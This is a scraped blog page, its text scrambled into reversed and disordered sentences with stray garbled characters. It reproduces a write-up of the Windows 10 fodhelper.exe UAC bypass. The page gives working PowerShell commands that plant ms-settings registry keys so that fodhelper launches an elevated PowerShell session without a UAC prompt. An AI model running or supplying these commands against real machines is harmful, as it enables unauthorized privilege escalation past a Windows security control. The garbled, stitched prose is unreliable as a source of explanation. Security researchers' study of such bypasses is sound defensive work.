printstotal.blogg.se

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force $program = "cmd /c start powershell.exe" #default In order to automate this process winscripting developed a powershell script that can perform the bypass in three steps: When “Manage Optional Features” or “ fodhelper.exe” runs again the command will be executed and an elevated PowerShell session will open: Fodhelper – Elevated PowerShell Since these registry entries doesn’t exist a user can create this structure in the registry in order to manipulate fodhelper to execute a command with higher privileges bypassing the User Account Contol (UAC).Ĭ:\Windows\System32\cmd.exe /c powershell.exeįodhelper – Creating the Registry Structure Manually HKCU:\Software\Classes\ms-settings\shell\open\command\(default) HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute HKCU:\Software\Classes\ms-settings\shell\open\command

The following checks are performed in the registry upon start of fodhelper.exe: Specifically winscripting discovered that the “ fodhelper” process when it starts it tries to find some registry keys which doesn’t exist. However processes that are running with higher privileges can give the opportunity to an attacker to execute code with the same level of privileges if they can be abused in a certain way. This can be verified by checking the Event Properties of the process: Fodhelper – Running as High Integrity Process This process is running as high integrity due to the fact the it has the binary has the autoelevate setting to “true”. When a user is requesting to open “Manage Optional Features” in Windows Settings in order to make a language change a process is created under the name fodhelper.exe. Windows 10 environments allow users to manage language settings for a variety of Windows features such as typing, text to speech etc.